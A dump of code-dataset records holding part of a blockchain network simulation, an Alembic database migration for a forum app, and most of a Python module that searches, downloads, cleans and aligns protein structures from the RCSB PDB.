`sender` disseminates a block to its information sets, i.e., other validators they are peering\n # with.\n\n # Getting all the sets that `sender` belongs to\n broadcast_list = get_all_sets_for_validator(network, sender) if to_sets is None else to_sets\n\n # The validator records that they have sent a block\n network.validators[sender].log_block(item)\n\n # Adding the block to network items\n networkItem = NetworkBlock(item=item, info_sets=broadcast_list)\n network.blocks.append(networkItem)\n\n # A set of all validators who need to update their internals after reception of the block\n broadcast_validators = set()\n for info_set_index in broadcast_list:\n broadcast_validators |= set(network.sets[info_set_index].validators)\n\n ask_to_check_backlog(network, broadcast_validators)\n\ndef update_network(network: Network) -> None:\n # The \"heartbeat\" of the network. When called, items propagate one step further on the network.\n\n # We need to propagate both blocks and attestations\n item_sets = [network.blocks, network.attestations]\n\n # These are the validators who receive a new item (block or attestation)\n broadcast_validators = set()\n\n for item_set in item_sets:\n for item in item_set:\n # For each item, we find the new validators who hear about it for the first time\n # and the validators who already do. Items propagate from validators who know about them.\n known_validators = set()\n for info_set in item.info_sets:\n known_validators = known_validators.union(set(network.sets[info_set].validators))\n\n # When a validator belongs to a set A where the item was propagated AND\n # to a set B where it wasn't, the validator propagates the item to set B\n unknown_sets = [i for i, s in enumerate(network.sets) if i not in item.info_sets]\n for unknown_set in unknown_sets:\n new_validators = set(network.sets[unknown_set].validators)\n for new_validator in new_validators:\n if new_validator in known_validators and new_validator not in network.malicious:\n item.info_sets.append(unknown_set)\n broadcast_validators |= new_validators\n break\n\n ask_to_check_backlog(network, broadcast_validators)\n","sub_path":"notebooks/reorg/beaconrunner/model/network.py","file_name":"network.py","file_ext":"py","file_size_in_byte":8842,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"151250450","text":"\"\"\"empty message\n\nRevision ID: 283656f60272\nRevises: \nCreate Date: 2018-07-13 19:24:09.979017\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '283656f60272'\ndown_revision = None\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('banner',\n sa.Column('id', sa.Integer(), autoincrement=True, nullable=False),\n sa.Column('banner_name', sa.String(length=250), nullable=False),\n sa.Column('image_url', sa.String(length=250), nullable=False),\n sa.Column('link_url', sa.String(length=250), nullable=False),\n sa.Column('priority', sa.Integer(), nullable=True),\n sa.Column('create_time', sa.DateTime(), nullable=True),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_table('board',\n sa.Column('id', sa.Integer(), autoincrement=True, nullable=False),\n sa.Column('board_name', sa.String(length=20), nullable=False),\n sa.Column('create_time', sa.DateTime(), nullable=True),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_table('cmsrole',\n sa.Column('id', sa.Integer(), autoincrement=True, nullable=False),\n sa.Column('name', sa.String(length=100), nullable=False),\n sa.Column('desc', sa.String(length=200), nullable=True),\n sa.Column('create_time', sa.DateTime(), nullable=True),\n sa.Column('permissions', sa.Integer(), nullable=True),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_table('cmsuser',\n sa.Column('id', sa.Integer(), autoincrement=True, nullable=False),\n sa.Column('username', sa.String(length=100), nullable=False),\n sa.Column('_password', sa.String(length=1500), nullable=False),\n sa.Column('email', sa.String(length=100), nullable=False),\n sa.Column('join_time', sa.DateTime(), nullable=True),\n sa.PrimaryKeyConstraint('id'),\n sa.UniqueConstraint('email')\n )\n op.create_table('front_user',\n sa.Column('id', sa.String(length=100), nullable=False),\n sa.Column('telephone', sa.String(length=12), nullable=True),\n sa.Column('username', sa.String(length=100), nullable=False),\n sa.Column('_password', sa.String(length=1500), nullable=False),\n sa.Column('email', sa.String(length=30), nullable=True),\n sa.Column('realname', sa.String(length=50), nullable=True),\n sa.Column('avatar', sa.String(length=100), nullable=True),\n sa.Column('singature', sa.String(length=100), nullable=True),\n sa.Column('gender', sa.String(length=10), nullable=True),\n sa.Column('join_time', sa.DateTime(), nullable=True),\n sa.PrimaryKeyConstraint('id'),\n sa.UniqueConstraint('email'),\n sa.UniqueConstraint('telephone')\n )\n op.create_table('cms_role_user',\n sa.Column('cms_role_id', sa.Integer(), nullable=False),\n sa.Column('cms_user_id', sa.Integer(), nullable=False),\n sa.ForeignKeyConstraint(['cms_role_id'], ['cmsrole.id'], ),\n sa.ForeignKeyConstraint(['cms_user_id'], ['cmsuser.id'], ),\n sa.PrimaryKeyConstraint('cms_role_id', 'cms_user_id')\n )\n op.create_table('follow',\n sa.Column('follower_id', sa.String(length=100), nullable=False),\n sa.Column('followed_id', sa.String(length=100), nullable=False),\n sa.Column('create_time', sa.DateTime(), nullable=True),\n sa.ForeignKeyConstraint(['followed_id'], ['front_user.id'], ),\n sa.ForeignKeyConstraint(['follower_id'], ['front_user.id'], ),\n sa.PrimaryKeyConstraint('follower_id', 'followed_id')\n )\n op.create_table('post',\n sa.Column('id', sa.Integer(), autoincrement=True, nullable=False),\n sa.Column('title', sa.String(length=200), nullable=False),\n sa.Column('content', sa.Text(), nullable=False),\n sa.Column('create_time', sa.DateTime(), nullable=True),\n sa.Column('hit', sa.Integer(), nullable=True),\n sa.Column('comment_num', sa.Integer(), nullable=True),\n sa.Column('author_id', sa.String(length=100), nullable=False),\n sa.Column('board_id', sa.Integer(), nullable=True),\n sa.ForeignKeyConstraint(['author_id'], ['front_user.id'], ondelete='CASCADE'),\n sa.ForeignKeyConstraint(['board_id'], ['board.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_table('comment',\n sa.Column('id', sa.Integer(), autoincrement=True, nullable=False),\n sa.Column('content', sa.Text(), nullable=False),\n sa.Column('create_time', sa.DateTime(), nullable=True),\n sa.Column('post_id', sa.Integer(), nullable=True),\n sa.Column('author_id', sa.String(length=100), nullable=True),\n sa.ForeignKeyConstraint(['author_id'], ['front_user.id'], ondelete='CASCADE'),\n sa.ForeignKeyConstraint(['post_id'], ['post.id'], ondelete='CASCADE'),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_table('highlight_post',\n sa.Column('id', sa.Integer(), autoincrement=True, nullable=False),\n sa.Column('post_id', sa.Integer(), nullable=True),\n sa.Column('create_time', sa.DateTime(), nullable=True),\n sa.ForeignKeyConstraint(['post_id'], ['post.id'], ondelete='CASCADE'),\n sa.PrimaryKeyConstraint('id')\n )\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_table('highlight_post')\n op.drop_table('comment')\n op.drop_table('post')\n op.drop_table('follow')\n op.drop_table('cms_role_user')\n op.drop_table('front_user')\n op.drop_table('cmsuser')\n op.drop_table('cmsrole')\n op.drop_table('board')\n op.drop_table('banner')\n # ### end Alembic commands ###\n","sub_path":"migrations/versions/283656f60272_.py","file_name":"283656f60272_.py","file_ext":"py","file_size_in_byte":5470,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"498864458","text":"import urllib.request\nimport pandas as pd\nimport pathlib\nfrom Bio import pairwise2\nfrom Bio.pairwise2 import format_alignment\nimport numpy as np\nimport os \nimport Bio.PDB\nfrom operator import itemgetter\nfrom itertools import groupby\nimport warnings\n\n# silence biopython warning \nfrom Bio import BiopythonWarning\nwarnings.simplefilter('ignore', BiopythonWarning)\n\n\n#### Download pdb and get information about them\n\nclass get_pdbs(object):\n def __init__(self,seq_template,template_type,cutoff=80.0):\n '''\n seq_template: searching sequence template (can be residue sequence or PDBID_CHAINID)\n template_type: 'pdb' or 'fasta' \n cutoff: similarity cutoff \n '''\n self.seq_template = seq_template\n self.template_type = template_type\n self.cutoff = cutoff\n\n\n def search_for_seq(self):\n '''\n search pdb database by sequence similarity comparing to seq_template pdb or fasta sequence. Structures with similarity higher than the cutoff value are kept\n\n input param:\n result_file: result txt file to store similar pdb ids \n '''\n\n url = 'http://www.rcsb.org/pdb/rest/search'\n if self.template_type == 'pdb':\n PDB_id = self.seq_template[:4]\n chain = self.seq_template[-1]\n sequence =''\n elif self.template_type == 'fasta':\n PDB_id =''\n chain = ''\n sequence = self.seq_template\n else:\n print('input type error!')\n\n queryText = \"\"\"\n \n org.pdb.query.simple.SequenceQuery\n Sequence Search (Structure:Chain = %s:%s, Expectation Value = 90.0, Search Tool = BLAST)\n %s\n %s\n %s\n %s\n blast\n %s\n \n \"\"\"%(PDB_id,chain, PDB_id, chain, sequence, self.cutoff, self.cutoff)\n\n print(\"querying PDB ID ...\\n\")\n\n req = urllib.request.Request(url=url, data=queryText.encode('UTF-8'))\n f = urllib.request.urlopen(req)\n result = f.read()\n\n if result:\n print (\"Found number of PDB entries:\", result.decode('UTF-8').count('\\n'))\n self.pdb_ids = [l[0:4] for l in result.decode('UTF-8').split('\\n')][0:-1]\n #outfile = open(result_file,'w')\n #outfile.write(result.decode('UTF-8'))\n #outfile.close()\n\n else:\n print(\"Failed to retrieve results\")\n\n #pdb_id_list = [l[0:4] for l in result.decode('UTF-8').split('\\n')][0:-1]\n #return pdb_id_list\n\n\n def get_pdb_info(self,pdb_id_list=None):\n '''\n Use to get pdb structural info such as experimental tech, deposit date, resolution, chain length etc.\n\n param:\n pdb_id_list : a list of pdb ids. If None, self.pdb_ids is used. \n #result_file: a file contains pdb details of entries in pdb_id_list \n\n\n '''\n if not pdb_id_list:\n pdb_id_list = self.pdb_ids\n pdb_id_query = ','.join(pdb_id_list)\n queryText = \"http://www.rcsb.org/pdb/rest/customReport.csv?pdbids=\" + pdb_id_query + \\\n \"&customReportColumns=experimentalTechnique,depositionDate,resolution,chainLength,\" + \\\n \"uniprotRecommendedName,geneName,source,phValue,rFree,averageBFactor,ligandId,ligandSmiles,Ki,Kd,IC50\" \\\n + \"&service=wsdisplay&format=csv&ssa=nul\"\n\n\n print(\"querying PDB information... \\n\")\n\n\n f = urllib.request.urlopen(queryText)\n result = f.read()\n result = result.decode('UTF-8')\n xml_file = result.split('
    ')\n xml_header = xml_file[0].split(',')\n index = len(xml_file)-1\n df = pd.DataFrame(index=range(1,index), columns=xml_header)\n a = 1\n for l in xml_file[1:-1]:\n b = 0\n for j in xml_header:\n df[j][a] = l.split(',')[b].strip('\"')\n b += 1\n a += 1\n\n #for i in df.index:\n # if df['ligandId'][i] in self.unwanted_hetams:\n # df['ligandId'][i] = np.nan\n # df['ligandSmiles'][i] = np.nan\n #df.drop([i], inplace=True)\n #df.drop_duplicates(subset=['structureId','chainId','ligandId'],inplace=True)\n #df.reset_index(inplace=True,drop=True)\n #df.to_csv(result_file,index_label='index')\n self.pdb_info = df\n\n\n\n def download_pdb(self,pdb_id,output_pdb):\n '''\n Use to download single pdb\n :param pdb_id: structure pdb id\n #output_pdb: output pdb file (dir/pdb_id.pdb)\n :return: None\n '''\n output_dir = '/'.join(output_pdb.split('/')[0:-1])\n os.makedirs(output_dir,exist_ok=True)\n try:\n urllib.request.urlretrieve('https://files.rcsb.org/download/%s.pdb'%pdb_id, output_pdb)\n except:\n print('Unable to download ' + pdb_id) \n\n\n def clean_pdb(self,pdb,output_pdb):\n '''\n clean pdb structure: fix insertion and alternative locations of atoms \n :param pdb: raw pdb file \n output_pdb: clean pdb file \n '''\n clean_pdb_dir = '/'.join(output_pdb.split('/')[0:-1])\n os.makedirs(clean_pdb_dir,exist_ok=True)\n \n# all_lines = [l for l in open(pdb,'r').readlines() if l.startswith('ATOM') or l.startswith('HETATM') or\\\n# l.startswith('TER') or l.startswith('MODEL') or l.startswith('ENDMDL')]\n all_lines = open(pdb,'r').readlines()\n atom_lines = [l for l in all_lines if l.startswith('ATOM') or l.startswith('HEATAM') or l.startswith('TER')]\n resi_label = atom_lines[0][22:27]\n resi_count = int(atom_lines[0][22:26])\n new_lines = []\n insertion = False\n for l in all_lines:\n if l.startswith('ATOM') or l.startswith('HETATM') or l.startswith('TER'):\n\n entry_type = l[0:6]\n altLoc = l[16]\n resi_label_new = l[22:27]\n icode = l[26]\n occupancy = l[54:60]\n\n # count number of residue by different residue label\n if resi_label_new != resi_label:\n resi_count +=1\n resi_label = resi_label_new\n altLoc_type = [] \n # label numbering shift if insertion happened\n if icode != ' ':\n insertion = True\n\n # fix residue number by residue count\n if insertion:\n l = l[0:22] + str(resi_count).rjust(4) + ' ' + l[27:]\n\n # for atom and hetatom with alternative position, keep those with occupancy >= 0.5\n\n if altLoc != ' ':\n if not altLoc in altLoc_type:\n altLoc_type.append(altLoc)\n\n #if (entry_type == 'ATOM ') and (altLoc == 'A'):\n # l = l[0:16] + ' ' + l[17:]\n # new_lines.append(l)\n if float(occupancy) >0.5:\n l = l[0:16] + ' ' + l[17:]\n new_lines.append(l)\n elif (float(occupancy) == 0.5) and (altLoc == altLoc_type[0]):\n l = l[0:16] + ' ' + l[17:]\n new_lines.append(l)\n\n elif entry_type == 'TER ':\n new_lines.append(l)\n else:\n new_lines.append(l)\n else:\n new_lines.append(l)\n output = open(output_pdb,'w')\n output.writelines(new_lines)\n\n\nclass complex_info(object):\n def __init__(self,pdb_info_csv,pdb_dir,unwanted_hetatms='default'):\n '''\n For each receptor chain get its ligand (can either be peptide or small molecules)\n process cleaned pdb structures: get receptor and ligand info, separate receptor and ligand structures and etc. \n param:\n pdb_info_csv: csv file generated from get_pdbs class \n pdb_dir: folder containing all pdbs listed in pdb_info_csv\n '''\n if type(pdb_info_csv) == str:\n if os.path.exists(pdb_info_csv) and pdb_info_csv.endswith('.csv'):\n self.df = pd.read_csv(pdb_info_csv,index_col='index')\n else:\n raise ValueError('unknown file type of pdb_info_csv. pdb_info_csv can be a csv file or a pandas DataFrame')\n elif type(pdb_info_csv) == pd.core.frame.DataFrame:\n self.df = pdb_info_csv\n else:\n raise ValueError('unknown file type of pdb_info_csv. pdb_info_csv can be a csv file or a pandas DataFrame')\n #self.pdb_info_csv = pdb_info_csv\n self.pdb_dir = pdb_dir\n if unwanted_hetatms == 'default':\n additive = ['1PE', 'ACT', 'AML', 'BCN', 'BEZ', 'BME', 'CIT', 'CO3', 'DMF','DMS', 'DTT', 'EDO', 'FMT', 'GOL',\n 'IMD', 'IPA', 'MES', 'MLA', 'MRD', 'PEG', 'PGE', 'PO4', 'SAR', 'SGM', 'SO4', 'SPK', 'TAR', 'TLA', 'TMO',\n 'TRS']\n\n ions = ['IOD', 'NA', 'BR', 'CL', 'K', 'SIN', 'ZN','MG']\n water = ['HOH']\n other = ['P15','PEU','EOH','O4B','MPO','GAI','PG4','MPD']\n self.unwanted_hetatms = additive + ions + water + other \n\n\n def get_receptor_ligand_info(self,template, template_type, template_pdb_dir=None, template_expt_type=None):\n ''' 1. For chains in a complex, distinguish receptor chains and peptide chains by a. sequence length and %alignment with template receptor chain \n 2. Check starting and ending residue id, sequence, gaps in receptor chain comparing to a template receptor chain \n 3. Get each receptor chains ligand info \n\n\n :param template_pdb_dir: folder containing template pdb \n :param template: pdb file use to define residue numbering and protein sequence, format pdbid_chainid or fasta AA sequence\n :param template_type: pdb or fasta\n :param template_pdb_dir: folder containing template pdb file (only needed for template_type == pdb)\n :param template_expt_type: SOLUTION NMR or X-RAY (only required for template_type == pdb) \n\n Note:\n 1. each receptor chain is aligned with template seq to get starting and ending residue number\n 2. peptide ligand chain screened as seq has poor match with the template sequence \n '''\n\n # get template sequence info \n if template_type == 'pdb':\n template_pdb = template.split('_')[0]\n template_chain = template.split('_')[1]\n if template_expt_type:\n temp_resStart, temp_resEnd, temp_seq = self._get_chain_res_info(template_pdb,template_chain,template_expt_type,\n pdb_folder=template_pdb_dir)\n else:\n raise ValueError('template_expt_type should be SOLUTION NMR or X-RAY')\n elif template_type == 'fasta':\n temp_resStart = 0\n temp_resEnd = len(template)-1\n temp_seq = template\n else:\n print('wrong template type')\n \n \n # pdb chains list \n# pdb_chains = self.df[['structureId','chainId','experimentalTechnique']].copy()\n# pdb_chains.drop_duplicates(inplace=True)\n # result header \n #A complex is a receptor chain with its ligand \n complex_info = np.append(self.df.columns,['resStart','resEnd','sequence_by_pdb_aligned','mutation','ligand_type', \\\n 'ligand_residue_id']).reshape(1,-1)\n\n # Peptide ligand info\n peptide_info = np.append(self.df.columns,['resStart','resEnd','sequence']).reshape(1,-1)\n\n# for i in pdb_chains.index:\n for i in self.df.index:\n #pdb = pdb_chains['structureId'][i]\n #chain = pdb_chains['chainId'][i]\n #expt_type = pdb_chains['experimentalTechnique'][i]\n\n pdb = self.df['structureId'].loc[i]\n chain = self.df['chainId'].loc[i]\n expt_type = self.df['experimentalTechnique'].loc[i]\n lig_name = self.df['ligandId'].loc[i]\n\n if not lig_name in self.unwanted_hetatms:\n #print(lig_name)\n if not (lig_name == '' or pd.isna(lig_name)):\n # distinguish regular ligand and modified residues \n lig_type, lig_resi_id = self._check_ligand(pdb,chain,lig_name,pdb_folder=self.pdb_dir)\n else:\n lig_type = 'apo'\n lig_resi_id = np.nan\n # get chain sequence info, modified residues are considered as part of the protein sequences \n resStart_pdb, resEnd_pdb, seq = self._get_chain_res_info(pdb,chain,expt_type,pdb_folder=self.pdb_dir)\n # get alignment result \n head_diff, end_diff, mutation, aligned_seq = self._align_seq(seq,temp_seq)\n if head_diff == None : ## head_diff == None indicates poor alignment --> not receptor chain\n peptide_info_entry = np.append(self.df.loc[i].tolist(), [resStart_pdb,resEnd_pdb,seq]).reshape(1,-1)\n peptide_info = np.append(peptide_info,peptide_info_entry,axis=0)\n \n else: \n # fix resStart and resEnd index using template seq residue indexing as reference \n resStart = int(temp_resStart) - head_diff \n resEnd = int(temp_resEnd) + end_diff \n # fix mutation site index using template seq residue indexing \n mut_new_list = [] \n for mut in mutation:\n mut_loc = int(mut[1:-1])\n if head_diff >= 0: \n mut_loc = mut_loc - head_diff \n else:\n mut_loc = mut_loc \n mut_new = mut[0] + str(mut_loc) + mut[-1]\n mut_new_list.append(mut_new)\n mutation_new = ';'.join(mut_new_list)\n\n \n # here only small molecule ligand is considered, peptide binder will be filled in later\n if lig_type in ['noncovalent','covalent','apo']:\n complex_info_entry = np.append(self.df.loc[i].tolist(),[resStart,resEnd,aligned_seq,mutation_new,lig_type,lig_resi_id]).reshape(1,-1)\n else: # in the case of modres\n new_df_info = self.df.loc[i].copy()\n new_df_info['ligandId'] = np.nan\n new_df_info['ligandSmiles'] = np.nan\n new_df_info['Ki'] = np.nan\n new_df_info['Kd'] = np.nan\n new_df_info['IC50'] = np.nan\n\n complex_info_entry = np.append(new_df_info.tolist(), [resStart,resEnd,aligned_seq,mutation_new,np.nan,np.nan]).reshape(1,-1)\n complex_info = np.append(complex_info,complex_info_entry,axis=0)\n else:\n pass\n \n complex_info_df = pd.DataFrame(data=complex_info[1:,:],columns=complex_info[0,:])\n complex_info_df.drop_duplicates(subset=['structureId','chainId','ligandId'],inplace=True)\n peptide_info_df = pd.DataFrame(data=peptide_info[1:,:],columns=peptide_info[0,:])\n peptide_pdbs = set(peptide_info_df['structureId'].tolist())\n\n \n peptide_ligand = complex_info_df.copy()\n peptide_ligand.drop_duplicates(subset=['structureId','chainId'],inplace=True)\n # fill in peptide inhibitor info\n peptide_drop_list = [] \n for i in peptide_ligand.index:\n pdb = peptide_ligand['structureId'].loc[i]\n chain = peptide_ligand['chainId'].loc[i]\n if pdb in peptide_pdbs:\n \n all_recep_chains = [c for c in peptide_ligand.loc[peptide_ligand['structureId'] == pdb]['chainId'].tolist()]\n peptide_chain = self._check_closest_peptide(pdb,chain, all_recep_chains, pdb_folder=self.pdb_dir)\n #print(peptide_chain)\n if peptide_chain:\n peptide_ligand['ligand_type'].loc[i] = 'peptide'\n peptide_ligand['ligandId'].loc[i] = peptide_chain \n peptide_ligand['ligand_residue_id'].loc[i] = peptide_chain\n peptide_ligand['Ki'].loc[i] = np.nan\n peptide_ligand['Kd'].loc[i] = np.nan\n peptide_ligand['IC50'].loc[i] = np.nan\n else: # if no nearby peptide chains detected, drop that row \n peptide_drop_list.append(i)\n else:\n peptide_drop_list.append(i)\n peptide_ligand.drop(peptide_drop_list,inplace=True)\n \n # label ligand binding site. If a chain has multiple ligands bound, each ligand is occupying a separate binding site.\n complex_all = pd.concat([complex_info_df,peptide_ligand],axis=0)\n complex_all.reset_index(inplace=True,drop=True)\n \n\n binding_site = [-1] * complex_all.shape[0] \n drop_list = [] \n for i in complex_all.index:\n pdb = complex_all['structureId'].loc[i]\n chain = complex_all['chainId'].loc[i]\n if binding_site[i] != -1:\n continue\n # print(pdb,chain)\n temp = complex_all.loc[(complex_all['structureId'] == pdb) & (complex_all['chainId'] == chain)]\n if temp.shape[0] > 1:\n site_count = 0\n for ind in temp.index:\n if not pd.isna(temp['ligandId'].loc[ind]):\n binding_site[ind] = site_count \n site_count += 1\n else:\n if not ind in drop_list:\n drop_list.append(ind)\n\n\n else:\n if pd.isna(complex_all['ligand_type'].loc[i]): # in the case of modres, ligand_type is originially set to np.nan. If after peptide ligand info updated, this chain still does not have a ligand, it should be an apo chain. \n complex_all['ligand_type'].loc[i] = 'apo' \n binding_site[i] = 0 \n \n complex_all.insert(complex_all.shape[1],'binding_site',binding_site) \n complex_all.drop(drop_list,inplace=True)\n self.complex_info = complex_all\n #self.peptide_info = peptide_info_df\n # Note: 2RUH has protein and peptide inhibitors linked together (CatS pdbs)\n\n @staticmethod\n def _check_ligand(pdb,chain,ligand_name,pdb_folder):\n '''\n For a ligand, find its residue id and check if it's a noncovalent ligand. \n \n :param pdb: pdb id\n :param chain: chain id\n :param ligand_name: the residue name of the ligand \n :param pdb_folder: folder for pdb files\n :return: ligand name list, number of ligands (one ligand name can have two ligands at diff sites)\n\n Note: additive, ions, water, and other cocrystal solvent is not considered as ligands\n '''\n pdb_lines = open(pdb_folder + '/' + pdb + '.pdb','r').readlines()\n link_lines = [l for l in pdb_lines if l.startswith('LINK')] \n link_resi = [q for t in [[l.split()[2],l.split()[6]] for l in link_lines] for q in t]\n modres_lines = [l for l in pdb_lines if l.startswith('MODRES')]\n modres = [l.split()[2] for l in modres_lines] \n\n #print(type(ligand_name))\n #print(ligand_name)\n if (ligand_name in link_resi) and (not ligand_name in modres):\n ligand_type = 'covalent'\n elif ligand_name in modres:\n ligand_type = 'modified residue'\n else:\n ligand_type = 'noncovalent'\n #print(ligand_name)\n for l in pdb_lines:\n if l[21] == chain and l[17:20].strip() == ligand_name and (l.startswith('ATOM') or l.startswith('HETATM')):\n ligand_resi_id = l[22:26].strip()\n break \n else:\n continue \n return ligand_type, ligand_resi_id\n\n# def _check_chain_hetatm(pdb,chain,pdb_folder):\n#\n# chain_lines = [l for l in pdb_lines if (l[21] == chain) and (l[17:20].strip() not in unwanted_hetatms)]\n#\n#\n# modified_resi = [] \n# modified_resi_id = [] \n# lig_resi =[]\n# lig_resi_id = [] \n#\n# hetatm_resi = [] \n# hetatm_resi_id = []\n# other_atm = False\n# for l in chain_lines: \n# if l.startswith('TER'):\n# \n# hetatm_resi_count = len(hetatm_resi)\n# if (hetatm_resi_count > 1) or (hetatm_resi_count == 1 and other_atm == True):\n# modified_resi.extend(hetatm_resi)\n# modified_resi_id.extend(hetatm_resi_id)\n# elif hetatm_resi_count == 1 and other_atm == False: \n# lig_resi.extend(hetatm_resi)\n# lig_resi_id.extend(hetatm_resi_id)\n# else:\n# pass \n# hetatm_resi = [] \n# hetatm_resi_id = []\n# other_atm = False \n#\n# elif l.startswith('HETATM'):\n# resi_name = l[17:20].strip()\n# resi_id = l[22:26].strip()\n# if not resi_id in hetatm_resi_id:\n# hetatm_resi_id.append(resi_id)\n# hetatm_resi.append(resi_name)\n# \n# elif l.startswith('ATOM'):\n# other_atm = True \n#\n# hetatm_resi_count = len(hetatm_resi)\n# if (hetatm_resi_count > 1) or (hetatm_resi_count == 1 and other_atm == True):\n# modified_resi.extend(hetatm_resi)\n# modified_resi_id.extend(hetatm_resi_id)\n# elif hetatm_resi_count == 1 and other_atm == False: \n# lig_resi.extend(hetatm_resi)\n# lig_resi_id.extend(hetatm_resi_id)\n# else:\n# pass \n#\n#\n# if modified_resi != []:\n# print(pdb + ' chain ' + chain + ' has nonstandard residues')\n## print('modified residues :')\n# print(modified_resi, modified_resi_id)\n#\n# \n# return lig_resi, lig_resi_id, modified_resi, modified_resi_id\n \n @staticmethod\n def _check_closest_peptide(pdb,chain,all_recep_chains, pdb_folder):\n '''\n for pdbs with peptide as ligand, get peptide chain id as ligand name\n :param pdb: pdb id\n :param chain: chain id\n :param receptor_csv: pandas dataframe containing receptor chain info\n :param pdb_folder: folder containing all pdb files\n :return: peptide ligand chain id\n '''\n\n\n def _calc_residue_dist(residue_one, residue_two):\n '''\n\n :param residue_one:\n :param residue_two:\n :return: return c-alpha distance between two residues\n '''\n diff_vector = residue_one['CA'].coord - residue_two['CA'].coord\n return np.sqrt(np.sum(diff_vector * diff_vector))\n\n def _calc_dist_matrix(chain_one, chain_two):\n '''\n\n :param chain_one:\n :param chain_two:\n :return: a matrix of C-alpha distance between two chains\n\n '''\n\n chain_one_resi = [i for i in chain_one for atom in i if atom.get_full_id()[4][0] == 'CA'] #get rid of wat and\n # capping which has no CA\n chain_two_resi = [i for i in chain_two for atom in i if atom.get_full_id()[4][0] == 'CA']\n\n answer = np.zeros((len(chain_one_resi),len(chain_two_resi)), np.float)\n for row, residue_one in enumerate(chain_one_resi):\n for col, residue_two in enumerate(chain_two_resi):\n answer[row,col] = _calc_residue_dist(residue_one, residue_two)\n return answer\n\n structure = Bio.PDB.PDBParser().get_structure(pdb,pdb_folder + '/' + pdb + '.pdb')\n model = structure[0] #in each model, it list all chains, unique chain id is considered as a seperate chain.\n # NMR structures has same chain id in different model, crystal structure has different chain id for diff monomer\n ref_chain = chain\n peptide_chain = None\n #print('all models ')\n if len(model) > 2: # non monomer and NMR including several models\n num_contact = 0\n for chain_name in model:\n #print(chain_name)\n chain_id = chain_name.get_full_id()[2]\n if chain_id != ref_chain and (chain_id not in all_recep_chains):\n dist_matrix = _calc_dist_matrix(model[chain_id], model[ref_chain])\n contact_array = np.where(dist_matrix < 8)\n num_contact_new = len(contact_array[0])\n\n if num_contact_new > num_contact:\n num_contact = num_contact_new\n peptide_chain = chain_id\n\n\n\n\n else: # monomer\n for chain_name in model:\n chain_id = chain_name.get_full_id()[2]\n if not chain_id == ref_chain:\n peptide_chain = chain_id\n return peptide_chain\n\n @staticmethod\n def _get_chain_res_info(pdb,chain,exp_type,pdb_folder):\n '''\n Get starting and ending residue id from pdb file and get sequence\n :param pdb: pdb id\n :param chain: chain id\n :return: starting residue id and ending residue id and AA sequence\n\n '''\n letters = {'ALA': 'A', 'ARG': 'R', 'ASN': 'N', 'ASP': 'D', 'CYS': 'C', 'GLU': 'E', 'GLN': 'Q', 'GLY': 'G',\n 'HIS': 'H', 'ILE':'I', 'LEU': 'L', 'LYS': 'K', 'MET': 'M', 'PHE': 'F', 'PRO': 'P', 'SER': 'S',\n 'THR': 'T', 'TRP': 'W', 'TYR': 'Y', 'VAL': 'V'}\n f = open(pdb_folder +'/' + pdb +'.pdb','r').readlines()\n link_lines = [l for l in f if l.startswith('LINK')] \n link_resi_in_chain = [] \n for l in link_lines:\n l_info = l.split()\n if l_info[3] == chain:\n link_resi_in_chain.append(l_info[2])\n if l_info[7] == chain:\n link_resi_in_chain.append(l_info[6])\n\n wanted_hetatms = [t for t in set(link_resi_in_chain) if not t in letters.keys()] \n\n if exp_type == 'SOLUTION NMR':\n for l in f:\n if l.startswith('MODEL'):\n chain_lines = []\n elif (l.startswith('ATOM') and l[21] == chain) or (l.startswith('HETATM') and l[21] == chain \\\n and (l[17:20].strip() in wanted_hetatms)):\n try:\n chain_lines.append(l)\n except ValueError:\n print('chain_lines not defined')\n\n elif l.startswith('ENDMDL'):\n break # only need to check the first model sequence in nmr structures \n\n else:\n chain_lines = [l for l in f if (l.startswith('ATOM') and l[21] == chain) or (l.startswith('HETATM') and l[21] == chain \\\n and (l[17:20].strip() in wanted_hetatms))]\n #chain_lines = [l for l in f if l.startswith('ATOM') or l and l[21] == chain]\n #print(pdb, chain)\n #print(chain_lines[0])\n resStart = chain_lines[0][22:26]\n resEnd = chain_lines[-1][22:26]\n\n res_id = None\n seq = ''\n for l in chain_lines:\n res_id_new = l[22:26]\n if not res_id_new == res_id:\n try:\n res_name = letters[l[17:20]] # if residue is normal amino acid \n except:\n res_name = 'x' # if residue is a modified aa \n seq = seq + res_name\n res_id = res_id_new\n\n else:\n next\n\n return resStart, resEnd, seq\n\n @staticmethod\n def _align_seq(seq,temp_seq):\n '''\n\n :param seq: sequence to be aligned\n :param temp_seq: template sequence\n :return:\n head_diff: n terminal sequence extra or missing number of residues comparing to template (int)\n end_diff: c terminal extra or missing number of resiudes (int)\n mutations: point of mutations format: Y12K\n '''\n\n def check_gap_and_mut(alignment_correct):\n aligned_seq = format_alignment(*alignment_correct).split('\\n')[0:3]\n\n gap_position = []\n gap_partner = []\n mutation = []\n for ind, x in enumerate(aligned_seq[1]):\n if x == ' ':\n gap_position.append(ind)\n if aligned_seq[0][ind] == '-':\n gap_partner.append(0) # seq = 0 \n else:\n gap_partner.append(1) # temp_seq = 1 \n elif x == '.':\n mut = aligned_seq[2][ind] + str(ind) + aligned_seq[0][ind]\n mutation.append(mut)\n\n\n #get sequence and template sequence gap position\n # seq = 0 and temp_seq = 1 in gap_partner array \n seq_gap_position = np.array(gap_position)[np.array(gap_partner)==0].tolist()\n temp_seq_gap_position = np.array(gap_position)[np.array(gap_partner) == 1].tolist()\n \n # get sequence gap group by grouping continuous gap positions\n if len(seq_gap_position) > 1:\n seq_group_result = []\n for key, group in groupby(enumerate(seq_gap_position),lambda x: x[0]-x[1]):\n group_result = tuple(map(itemgetter(1),group))\n seq_group_result.append(group_result)\n\n elif len(seq_gap_position) == 1:\n seq_group_result = [(seq_gap_position[0],)]\n else:\n seq_group_result = []\n\n # get template sequence gap groups 